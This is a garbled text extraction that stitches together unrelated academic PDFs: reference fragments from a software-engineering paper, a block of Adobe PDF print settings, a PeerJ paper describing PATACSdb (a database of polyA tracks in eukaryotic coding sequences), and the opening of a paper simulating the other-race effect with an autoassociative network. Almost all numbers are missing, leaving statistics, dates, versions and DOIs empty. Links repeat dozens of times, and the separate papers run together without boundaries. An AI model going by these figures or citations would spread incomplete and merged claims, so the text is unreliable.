iwsm/metrikon. potsdam. salman i, misirli at, juristo n. . are students representatives of professionals in software engineering experiments? in: ieee/acm th ieee international conference on software engineering. piscataway: ieee. bogner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /cleiej. . . http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ on the impact of service-oriented patterns on software evolvability: a controlled experiment and metric-based analysis introduction background experiment design experiment results metric analysis discussion threats to validity lessons learned from the experiment conclusion flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice patacsdb---the database of polya translational attenuators in coding sequences submitted december accepted january published february corresponding author pawel szczesny, szczesny@ibb.waw.pl academic editor tak-wah lam additional information and declarations can be found on page doi . /peerj-cs. copyright habich et al. distributed under creative commons cc-by . open access patacsdb—the database of polya translational attenuators in coding sequences malgorzata habich , sergej djuranovic and pawel szczesny , institute of biochemistry and biophysics polish academy of sciences, department of bioinformatics, warsaw, poland department of cell biology and physiology, washington university school of medicine, saint louis, mo, united states of america faculty of biology, institute of experimental plant biology and biotechnology, university of warsaw, warsaw, poland abstract recent additions to the repertoire of gene expression regulatory mechanisms are polyadenylate (polya) tracks encoding for poly-lysine runs in protein sequences. such tracks stall the translation apparatus and induce frameshifting independently of the effects of charged nascent poly-lysine sequence on the ribosome exit channel. as such, they substantially influence the stability of mrna and the amount of protein produced from a given transcript. single base changes in these regions are enough to exert a measurable response on both protein and mrna abundance; this makes each of these sequences a potentially interesting case study for the effects of synonymous mutation, gene dosage balance and natural frameshifting. here we present patacsdb, a resource that contain a comprehensive list of polya tracks from over eukaryotic genomes. our data is based on the ensembl genomic database of coding sequences and filtered with algorithm of a- which selects sequences of polya tracks with a minimal length of a’s allowing for one mismatched base. the patacsdb database is accessible at: http://sysbio.ibb.waw.pl/patacsdb. the source code is available at http://github.com/habich/patacsdb, and it includes the scripts with which the database can be recreated. subjects bioinformatics, databases keywords ribosome stalling, gene regulation, eukaryotic genomes, mrna stability, translation background the classical view of the genetic information flow inside living cells—the transcription from dna to rna and finally translation of mrna into protein—is a subject of continous modification for both direction of the flow and the number of players involved. after decades of research we keep accumulating evidences of several control points at different levels of these processes. the past studies were focused on transcriptional regulation, but more recently the regulation of gene expression at the level of translation drew researchers’ attention. translational regulation generally controls the amount of protein synthesised from a given mrna through several mechanisms, targeting recruitment of ribosomes to how to cite this article habich et al. ( ), patacsdb—the database of polya translational attenuators in coding sequences. peerj comput. sci. :e ; doi . /peerj-cs. mailto:szczesny@ibb.waw.pl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://sysbio.ibb.waw.pl/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://github.com/habich/patacsdb http://dx.doi.org/ . /peerj-cs. the transcript, elongation speed, termination and as a proxy to all these processes mrna stability. ribosome stalling—the pausing of ribosome during translational cycle—is recognized by components of several mrna surveillance pathways. as a result of the im- peded rate of ribosome along the mrna, the transcript is endonucleolytically cleaved and nascent albeit incomplete protein product is degraded by proteasome (shoemaker & green, ). over the years, we have got to know that certain sequence features can trigger ribo- some stalling. these are damaged bases (cruz-vera et al., ), stable stem-loop structures (doma & parker, ), rare codons (letzring, dean & grayhack, ), mrnas lacking stop codons (so called non-stop mrnas) (dimitrova et al., ), runs of codons that encode consecutive basic aminoacids (kuroha et al., ; brandman et al., ), or finally, runs of adenines encoding poly-lysine tracks (koutmou et al., ; arthur et al., ). we have recently shown that polya tracks trigger a response in a different manner than runs of basic aminoacids (arthur et al., ). in addition to stalling, they occasionally lead to ribosome sliding on mrna transcript which results in production of additional frameshifted product next to the known and well annotated gene protein product. as such polya track sequences may support programed translational frameshifts in such mrna transcripts giving rise to alternative protein products from those genes. this feature of polya track genes resembles programmed frameshifting observed in viral genes with slippery sequences however without a need for additional mrna structures that induces ribosome stalling in known viral transcripts (chen et al., ; yan et al., ). the ultimate control over the production and stability of alternative transcripts from polya track genes in eukaryotes would be based on mrna surveillance mechanisms, mainly non-sense mediated mrna decay (nmd) or if the kinetic stall persists by no-go mrna decay (ngd). polya tracks are highly conserved in genes among eukaryotes and it is likely that they represent a universal translational attenuators or programed translational frameshift signals. intrinsically this novel rna motif plays an important role in balancing gene dosage and homeostasis of cellular environment. the level of attenuation, frameshifting and exact role of polya tracks in organisms homeostasis is still to be elucidated. patacsdb server while there are several resources devoted to polyadenylation signals in genomic sequences, these have different sequence signature and refer to the processing of mrna, not translation. no genomic database reports polya tracks in coding sequences, therefore we have designed patacsdb (polya translational attenuators in coding sequences database), a resource devoted to collection of such features among eukaryotic organisms. in concordance with our experimental data from the controlled expression of reporter sequences or natural gene expression profiles we have designed a a- pattern, that is pattern of twelve adenines in coding region allowing for one mismatch. based on our experiments, this is a minimal pattern that should result in reduction of expression by roughly %, a magnitude that can potentially have a measurable biological impact in human cells (arthur et al., ). we have extrapolated this pattern to other organisms, habich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. table summary of the content of patacsdb. feature value total number of polya-carrying transcripts , highest percentage of polya-carrying transcripts (first ) plasmodium berghei . % plasmodium yoelii × . % plasmodium falciparum . % plasmodium chabaudi . % plasmodium reichenowi . % lowest percentage of polya-carrying transcripts (first ) pythium vexans . % saprolegnia diclina vs. . % leishmania major . % phytophthora sojae . % salpingoeca rosetta . % median and average percentage of polya-carrying transcripts . % and . % respectively the longest polya tracks (first ) nt—cdo (plasmodium reichenowi) nt—cdo (plasmodium reichenowi) nt—etw (plasmodium falciparum fch ) nt—etw (plasmodium falciparum palo alto uganda) nt—etw (plasmodium falciparum nf c ) nt—etw (plasmodium falciparum vietnam oak knoll fvo) nt—cdo (plasmodium reichenowi) nt—eut (plasmodium falciparum santa lucia) nt—etw (plasmodium falciparum nf c ) nt—etw (plasmodium falciparum malips e ) because without further experimental work we have no way to define the minimal polya pattern in other organisms. we have analyzed eukaryotic ensembl genomes (flicek et al., ) for the presence of this pattern in coding sequences, using only these entries for which coding sequence matched reported translated sequence. this was done not only on standard ensembl genomes but additional eukaryotic databases like ensembl protists and ensembl metazoa. as a result, we have identified , genes in genomes that carry , polya tracks. polya tracks across eukaryotic organisms in the previous studies (koutmou et al., ; arthur et al., ) we focused mainly on polya tracks from human and yeast genomes, using the ncbi (pruitt et al., ) database and sgd (cherry et al., ) as data sources, respectively. overall there is a good agreement between our previous analysis and this study for high eukaryotes, while we see some discrepancies for lower eukaryotes such as yeast. for example, in the previous study we have underestimated the number of polya-carrying genes in yeast by an order of magnitude ( vs. )—a result of different data source. the percentage of polya carrying transcripts varies from organism to organism and exceeds % for plasmodium species, well known for their at-rich genome (see table for summary). however, the distribution of lengths of polya tracks is quite similar across habich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. figure distribution of polya lengths vs. at-ratio of analyzed genomes. data for lengths of polya were divided into bins distributed evenly across spectrum of at-richness of analyzed genomes. the width of a box is proportional to the number of observances in a particular bin. lines denote . ∗iqr (interquantile range). outliers were removed for clarity. data start at length of , as this was the length of the minimal pattern used. whole observed spectrum of at-content (fig. ). it might be that the single plasmodium genus is skewing the distribution, as the species distribution of genomic databases is heavily biased. in humans, only around % of transcripts coming from ca. % of genes carry polya track and, as such, are subjects of translational attenuation. this is close to a median across all analyzed genomes. furthermore, we did not find any correlation between organismal complexity and number of polya-affected genes. this might indicate that such a feature is a constituent element of translational machinery, unrelated to external factors and regulatory mechanisms. software architecture the main table consists of protein common name, gene and transcripts ensembl ids, location of the polya track expressed as percentage (allows for quick identification of cases where polya track is either at the end or at the beginning of the protein) and, finally, the identified polya track with a context of surrounding sequence. all columns are sortable. by default, the table is alphabetically sorted by protein name. sorting gene and transcript ids is also alphabetical. location is sorted numerically. the rows with polya sequences is sortable by polya track length, so the user can quickly identify sequences with the longest track in particular organism. obviously, due to the used pattern, the shortest polya tracks habich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. have length of nucleotides. to facilitate quick interaction with tables, we have used bootstrap-table library that allows for easy and intuitive sorting and searching through all fields in particular genome. the project was created using python . . to parse biological data, we used biopython . . to compare protein and cdna sequences, we used local version of ncbi blast+ software v. . . . to run the web service, we used flask v. . . . we used sqlite database engine and sqlalchemy for database access. to query the ensembl database, we used mysql client. we also used two other python libraries: xmltodict and requests. the most difficult task was to ensure short pageload times given the large dataset on which we worked. to solve this problem, we have created additional tables in database which contain metadata with the heaviest queries. this solution decreased time of loading more than times. we have designed a two-step architecture. in the first step, we analyse data from the ensembl database and create our database with a- pattern. in the second step, we use created database to provide information to the web service. this architecture allows one to separate obtaining data and running the web service, thus, during analysis of new version of ensembl data we still can provide data about old version, and changes between versions can be effected in seconds without the notice of the user. in the future, we will work on parallelization process of ensembl data analysis to speed up the first step. it is likely that polya segments are not the only sequence determinants of translation efficiency in coding sequences, and further studies will discover more of such motifs or different lengths of minimal polya pattern for a particular organism. the design of the patacsdb engine allows for easy modification towards finding and cataloguing of novel sequence patterns. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • malgorzata habich conceived and designed the experiments, performed the experi- ments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • sergej djuranovic conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. • pawel szczesny conceived and designed the experiments, performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, reviewed drafts of the paper. habich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: https://github.com/habich/patacsdb/. references arthur l, pavlovic-djuranovic s, smith-koutmou k, green r, szczesny p, djuranovic s. . translational control by lysine-encoding a-rich sequences. science advances ( ):e doi . /sciadv. . brandman o, stewart-ornstein j, wong d, larson a, williams cc, li g-w, zhou s, king d, shen ps, weibezahn j, dunn jg, rouskin s, inada t, frost a, weissman js. . a ribosome-bound quality control complex triggers degradation of nascent peptides and signals translation stress. cell : – doi . /j.cell. . . . chen j, petrov a, johansson m, tsai a, o’leary se, puglisi j. . dynamic pathways of − translational frameshifting. nature : – doi . /nature . cherry jm, adler c, ball c, chervitz sa, dwight ss, hester et, jia y, juvik g, roe t, schroeder m, weng s, botstein d. . sgd: saccharomyces genome database. nucleic acids research : – doi . /nar/ . . . cruz-vera lr, magos-castro ma, zamora-romo e, guarneros g. . ribosome stalling and peptidyl-trna drop-off during translational delay at aga codons. nucleic acids research : – doi . /nar/gkh . dimitrova ln, kuroha k, tatematsu t, inada t. . nascent peptide-dependent translation arrest leads to not p-mediated protein degradation by the proteasome. the journal of biological chemistry : – doi . /jbc.m . doma mk, parker r. . endonucleolytic cleavage of eukaryotic mrnas with stalls in translation elongation. nature : – doi . /nature . flicek p, amode mr, barrell d, beal k, billis k, brent s, carvalho-silva d, clapham p, coates g, fitzgerald s, gil l, girón cg, gordon l, hourlier t, hunt s, johnson n, juettemann t, kähäri ak, keenan s, kulesha e, martin fj, maurel t, mclaren wm, murphy dn, nag r, overduin b, pignatelli m, pritchard b, pritchard e, riat hs, ruffier m, sheppard d, taylor k, thormann a, trevanion sj, vullo a, wilder sp, wilson m, zadissa a, aken bl, birney e, cunningham f, harrow j, herrero j, hubbard tjp, kinsella r, muffato m, parker a, spudich g, yates a, zerbino dr, searle smj. . ensembl. nucleic acids research :d –d doi . /nar/gkt . koutmou ks, schuller ap, brunelle jl, radhakrishnan a, djuranovic s, green r. . ribosomes slide on lysine-encoding homopolymeric a stretches. elife :e doi . /elife. . kuroha k, akamatsu m, dimitrova l, ito t, kato y, shirahige k, inada t. . receptor for activated c kinase stimulates nascent polypeptide-dependent translation arrest. embo reports : – doi . /embor. . . letzring dp, dean km, grayhack ej. . control of translation efficiency in yeast by codon-anticodon interactions. rna : – doi . /rna. . pruitt kd, brown gr, hiatt sm, thibaud-nissen f, astashyn a, ermolaeva o, farrell cm, hart j, landrum mj, mcgarvey km, murphy mr, o’leary na, pujar s, rajput b, rangwala sh, riddick ld, shkeda a, sun h, tamez p, tully re, wallin c, webb d, habich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ https://github.com/habich/patacsdb/ http://dx.doi.org/ . /sciadv. http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /nature http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /nar/gkh http://dx.doi.org/ . /jbc.m http://dx.doi.org/ . /nature http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . /elife. http://dx.doi.org/ . /embor. . http://dx.doi.org/ . /rna. http://dx.doi.org/ . /peerj-cs. weber j, wu w, dicuccio m, kitts p, maglott dr, murphy td, ostell jm. . refseq: an update on mammalian reference sequences. nucleic acids research :d –d doi . /nar/gkt . shoemaker cj, green r. . translation drives mrna quality control. nature structural & molecular biology : – doi . /nsmb. . yan s, wen j-d, bustamante c, tinoco jr i. . ribosome excursions during mrna translocation mediate broad branching of frameshift pathways. cell : – doi . /j.cell. . . . habich et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /nar/gkt http://dx.doi.org/ . /nsmb. http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /peerj-cs. patacsdb---the database of polya translational attenuators in coding sequences background patacsdb server polya tracks across eukaryotic organisms software architecture references connection science, , ( ), – . simulating the “other-race effect” as a problem in perceptual learning alice o’toole the university of texas at dallas ken deffenbacher the university of nebraska at omaha hervé abdi the university of texas at dallas jim bartlett the university of texas at dallas we report a series of simulations on the well-known “other-race effect.” we trained an autoassociative network on a majority and a minority race of faces, and tested the model’s ability to process faces from the two races in different ways. first, the model was better able to reconstruct unlearned majority faces than minority faces. secondly, the average inter-face similarity was higher for the reconstructed minority faces than for reconstructed majority faces, indi- cating that the model was coding the majority faces more distinctively than the minority faces. these results held for caucasian faces as the majority race and japanese faces as the minority race and vice versa. thirdly, we simulated a recognition task for same- and other-race faces by using a face history matrix and a recognition task matrix with equal numbers of caucasian and japanese faces, and reconstructing these faces as a weighted combination of the two matrices. using caucasian faces as the majority race, the model was better able to discriminate learned from new caucasian faces than learned from new japanese faces. we discuss the results in terms of perceptual tuning to information useful for processing faces of a single race. keywords:face memory, autoassociative memory, neural network, other-race effect. . introduction for many years scientist and layperson alike have suspected that faces of one’s own race are thanks are due to june chance and al goldstein for providing the caucasian and japanese faces used in the simulations, and to peter assmann, barbara edwards and two anonymous reviewers for helpful comments on an earlier version of this manuscript. this project was supported in part by national institute of aging grant ro -ag to j.c.b. send correspondence about this paper to hervé abdi: herve@utdallas.edu. home page: http://www.utdallas.edu/∼herve. recognized more accurately than faces of another race. in the early part of the century, feingold ( ,p. ) stated the supposition and a plausible reason for its existence this way other things being equal, individuals of a given race are distinguishable from each other in proportion to our familiarity, to our contact with the race as a whole. thus, to the uninitiated american all asi- atics look alike, while to the asiatic, all white men look alike. more recently, it has been shown that approxi- mately half of potential jurors believe that such a bias exists (deffenbacher & loftus, ). indeed, abundant empirical support for the own-race bias in face recognition accuracy can be found in the recent meta-analyses of a large number of studies o’toole, deffenbacher, abdi, & bartlett on the topic (shapiro & period, ; bothwell et al., ). several hypotheses have been advanced to ac- count for the cross-race phenomenon: faces of some races are inherently more difficult to identify than others; prejudicial attitudes lead to less ac- curate recognition for other-race faces; and other- race faces are processed more superficially than same-race faces. there is little support for any of these accounts (brigham, ). a fourth possi- bility is that implied by the quote from feingold ( ): an own-race bias is in direct proportion to the difference in amount of contact with persons of one’s own and another race. several studies have found a smaller other-race effect for persons living in more racially integrated circumstances (cross et al., ; feinman & entwistle, ). however, while at least one study (brigham et al., ) yielded a small but significant correlation of self-reported degree of cross-race contact and cross-race recognition ability, other studies (e.g. brigham & barkowitz, ) have found no rela- tionship at all. it may be, however, that current techniques are not sensitive enough to adequately assess the quan- tity and quality of contact with persons of another race. there are data which suggest that the cross- race effect may indeed be a matter of differen- tial exposure to faces of different races. for one thing, a number of attempts to improve same-race face recognition have all failed (malpass, ). however, similar training efforts for other-race face recognition have yielded improvements (e.g. goldstein & chance, ). we think that the differential effects of further training in face recognition are due to differen- tial amounts of perceptual learning associated with same versus other-race faces. a cross-sectional study of the development of face recognition abil- ity by chance et al. ( ) found that year old caucasian children show only a small cross-race effect recognizing japanese compared with cau- casian faces. at successively older ages up to early adulthood, ability to recognize both races in- creased, but ability to recognize same-race (cau- casian) faces increased much more rapidly. hence, any attempt to improve same-race face recogni- tion by short-term training programs may be inade- quate compared with years of extensive processing of same-race faces. studies examining the role of perceptual learn- ing in the other-race effect are difficult to carry out empirically for two reasons. first, while it may be possible to find subject populations with a relatively controlled “face-learning” history, it is generally not possible to equate the populations along other important cultural and social dimen- sions that may affect performance on the task. sec- ondly, as we have already noted, short-term per- ceptual learning studies involving practice with a single race of faces are not necessarily adequate to control for the lifetime experience of observers with faces of their own race. these methodological difficulties make the cross-race effect an ideal can- didate for simulation approaches to understanding the psychological data. in the present study, we present simulations of a perceptual learning account of the other-race ef- fect that is based on the following principles. first, we assume that faces of different races comprise different statistical categories of faces. secondly, within a given category of faces, a set of differen- tially weighted “features ” is optimal for encoding faces in a manner that makes faces within the cate- gory most discriminable. different feature sets and weightings, however, are optimal for processing faces from other-race categories of faces. thirdly, with exposure to many faces of a given race and a smaller number of faces of other races, perceptual learning enables observers to make optimal use of the features that are best for processing faces from the category with which they have had the most experience, topically, faces of their own race. by this account, the difficulties experienced with faces of another race are due to the fact that the optimal features for distinguishing faces of one’s own race are not optimal in processing the faces of another race. one way to simulate the other-race effect is to train an autoassociative network on different pro- portions of faces of an ’own’ and ’other’ race. we referred to in the face recognition literature simply as “experience.” the word features is used in its most general sense without commitment to a specific definition. simulating the other-race effect trained an autoassociative system on a large num- ber of faces of a majority race and a smaller num- ber of faces of a minority race to mimic the other- race effect. the advantages of an autoassociative memory used with widrow-hoff error correction is that it will develop connection weights in such a way as to optimize the storage capacity of the matrix. thus, with very similar stimuli, such as a single race of faces, the model should tune itself to the information important for processing faces from within the class. due to the distributed nature of the memory, when faces are retrieved from the system, they will be filtered by the learning history of the system. several predictions about the system’s ability to process same- and other-race faces follow. first, when the network is trained on a majority of faces of one race and a minority of faces of another race, its ability to represent faces of the majority race should be better than its ability to represent faces from the minority race. this is due to the fact that model will have developed “features” that are more appropriate for faces of the majority race. we can assess the validity of this prediction by looking at the quality of face reconstructions for new (pre- viously unencountered) faces of the majority and minority races. secondly, reconstructed new faces of the minority race should be more similar to one another than reconstructed faces of the majority race. in other words, the average inter-face sim- ilarity should be greater for reconstructed minority faces than for reconstructed majority faces. this is because the model will not develop a coding that makes optimal use of the distinguishing features for the minority race; hence, these faces should be “perceptually” more similar to one another. fi- nally, the model should be better able to recognize majority faces than minority faces. the simulations serve, first, to test the model qualitatively as a face recognition tool with a much larger and higher quality stimulus set than that used previously (kohonen, ; o’toole et al., ; o’toole & abdi, ). we will look specifically at the model’s performance with re- spect to the predictions stated above. secondly, this type of model suggests a differ- ent definition of features than has previously been used to characterize faces. since the autoasso- ciative memory can be decomposed into a set of eigenvectors, and since faces learned by the model can be reconstructed by the weighted combina- tion of these eigenvectors, the eigenvectors may be thought of as features for characterizing the stimulus set. we should expect to see differences in eigenvectors based on the face history of the model. furthermore, since we used a simple visual code in these simulations, the eigenvectors can be displayed as images. we shall discuss the potential role of the eigenvectors as features for characteriz- ing same-and other-race faces. simulation the model is defined first and then its applica- tion to the other-race problem is presented. a dig- itized image of each face was coded as a vector comprised of pixel elements concatenated from the rows of the face image. thus, the ith face was rep- resented by a j × vector (where j is equal to the width times the height of the face image in pixels) and is denoted by fi. for convenience, normalized vectors are assumed (i.e. fti fi = ). the autoasso- ciative matrix was constructed as a = ∑ i fif t i ( ) recall of individual faces from the matrix was done according to the rule f̂i = afi ( ) where f̂i is the system estimate of fi. the qual- ity of this estimate is measured by comparing the reconstructed image with the original image using the cosine of the angle between the vectors f̂i and fi. the widrow-hoff error-correction rule was ap- plied iteratively to optimize the quality of the recall across the stimulus set a[t+ ] = a[t] − γ ( fi − a[t]fi ) fti ( ) where i is randomly chosen and γ decreases as the reciprocal of the iteration number. since the eigen-decomposition of the autoasso- ciative matrix is equivalent to principal component analysis (abdi, ), the autoassociative matrix o’toole, deffenbacher, abdi, & bartlett figure . mean cosines between original and reconstructed images for the old and new majority and minority faces. simulating the other-race effect can give indications of the statistical structure of the stimulus 